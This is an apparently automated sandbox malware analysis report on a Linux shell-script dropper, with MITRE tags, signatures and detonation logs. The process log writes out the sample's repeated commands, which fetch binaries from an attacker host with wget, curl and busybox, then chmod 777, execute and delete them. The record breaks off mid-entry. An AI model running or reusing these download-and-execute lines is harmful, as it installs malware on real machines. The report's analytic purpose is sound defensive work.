Malware Analysis Report

2025-05-28 20:51

Sample ID 241021-cd6trsshrf
Target fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f.sh
SHA256 fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f
Tags
defense_evasion discovery antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f

Threat Level: Shows suspicious behavior

The file fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery antivm

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

System Network Configuration Discovery

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-21 01:58

Signatures

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-21 01:58

Reported

2024-10-21 02:01

Platform

debian9-mipsbe-20240418-en

Max time kernel

77s

Max time network

75s

Command Line

[/tmp/fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg /tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg N/A
N/A /tmp/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2 /tmp/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2 N/A
N/A /tmp/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5 /tmp/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5 N/A
N/A /tmp/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb /tmp/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb N/A
N/A /tmp/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8 /tmp/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8 N/A
N/A /tmp/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q /tmp/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q N/A
N/A /tmp/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL /tmp/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL N/A
N/A /tmp/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz /tmp/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz N/A
N/A /tmp/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8 /tmp/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8 N/A
N/A /tmp/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q /tmp/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q N/A
N/A /tmp/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh /tmp/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh N/A
N/A /tmp/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ /tmp/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ N/A
N/A /tmp/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3 /tmp/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3 N/A
N/A /tmp/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza /tmp/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza N/A
N/A /tmp/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz /tmp/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz N/A
N/A /tmp/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8 /tmp/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8 N/A
N/A /tmp/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q /tmp/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q N/A
N/A /tmp/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh /tmp/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh N/A
N/A /tmp/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ /tmp/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ N/A
N/A /tmp/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3 /tmp/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3 N/A
N/A /tmp/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza /tmp/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza N/A
N/A /tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg /tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg N/A
N/A /tmp/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2 /tmp/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2 N/A
N/A /tmp/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5 /tmp/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5 N/A
N/A /tmp/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb /tmp/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb N/A
N/A /tmp/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8 /tmp/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8 N/A
N/A /tmp/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q /tmp/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q N/A
N/A /tmp/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL /tmp/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5 /usr/bin/curl N/A
File opened for modification /tmp/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8 /usr/bin/curl N/A
File opened for modification /tmp/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza /usr/bin/curl N/A
File opened for modification /tmp/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ /usr/bin/curl N/A
File opened for modification /tmp/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3 /usr/bin/curl N/A
File opened for modification /tmp/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh /usr/bin/curl N/A
File opened for modification /tmp/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8 /usr/bin/curl N/A
File opened for modification /tmp/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb /usr/bin/curl N/A
File opened for modification /tmp/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8 /usr/bin/curl N/A
File opened for modification /tmp/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q /usr/bin/curl N/A
File opened for modification /tmp/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ /usr/bin/curl N/A
File opened for modification /tmp/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8 /usr/bin/curl N/A
File opened for modification /tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg /usr/bin/curl N/A
File opened for modification /tmp/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q /usr/bin/curl N/A
File opened for modification /tmp/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz /usr/bin/curl N/A
File opened for modification /tmp/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3 /usr/bin/curl N/A
File opened for modification /tmp/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz /usr/bin/curl N/A
File opened for modification /tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg /usr/bin/curl N/A
File opened for modification /tmp/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5 /usr/bin/curl N/A
File opened for modification /tmp/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb /usr/bin/curl N/A
File opened for modification /tmp/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh /usr/bin/curl N/A
File opened for modification /tmp/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL /usr/bin/curl N/A
File opened for modification /tmp/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q /usr/bin/curl N/A
File opened for modification /tmp/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL /usr/bin/curl N/A
File opened for modification /tmp/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2 /usr/bin/curl N/A
File opened for modification /tmp/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza /usr/bin/curl N/A
File opened for modification /tmp/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2 /usr/bin/curl N/A
File opened for modification /tmp/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q /usr/bin/curl N/A

Processes

/tmp/fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f.sh

[/tmp/fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]

/bin/chmod

[chmod 777 Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]

/tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg

[./Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]

/bin/rm

[rm Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]

/bin/chmod

[chmod 777 aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]

/tmp/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2

[./aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]

/bin/rm

[rm aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]

/bin/chmod

[chmod 777 eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]

/tmp/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5

[./eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]

/bin/rm

[rm eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]

/bin/chmod

[chmod 777 WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]

/tmp/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb

[./WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]

/bin/rm

[rm WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]

/bin/chmod

[chmod 777 f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]

/tmp/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8

[./f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]

/bin/rm

[rm f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]

/bin/chmod

[chmod 777 izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]

/tmp/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q

[./izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]

/bin/rm

[rm izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]

/bin/chmod

[chmod 777 fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]

/tmp/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL

[./fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]

/bin/rm

[rm fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]

/bin/chmod

[chmod 777 cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]

/tmp/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz

[./cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]

/bin/rm

[rm cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]

/bin/chmod

[chmod 777 s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]

/tmp/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8

[./s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]

/bin/rm

[rm s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]

/bin/chmod

[chmod 777 lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]

/tmp/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q

[./lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]

/bin/rm

[rm lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]

/bin/chmod

[chmod 777 WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]

/tmp/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh

[./WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]

/bin/rm

[rm WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]

/bin/chmod

[chmod 777 Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]

/tmp/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ

[./Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]

/bin/rm

[rm Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]

/bin/chmod

[chmod 777 lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]

/tmp/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3

[./lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]

/bin/rm

[rm lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]

/bin/chmod

[chmod 777 oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]

/tmp/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza

[./oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]

/bin/rm

[rm oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]

/bin/chmod

[chmod 777 cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]

/tmp/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz

[./cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]

/bin/rm

[rm cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]

/bin/chmod

[chmod 777 s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]

/tmp/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8

[./s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]

/bin/rm

[rm s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]

/bin/chmod

[chmod 777 lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]

/tmp/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q

[./lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]

/bin/rm

[rm lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]

/bin/chmod

[chmod 777 WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]

/tmp/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh

[./WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]

/bin/rm

[rm WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]

/bin/chmod

[chmod 777 Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]

/tmp/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ

[./Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]

/bin/rm

[rm Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]

/bin/chmod

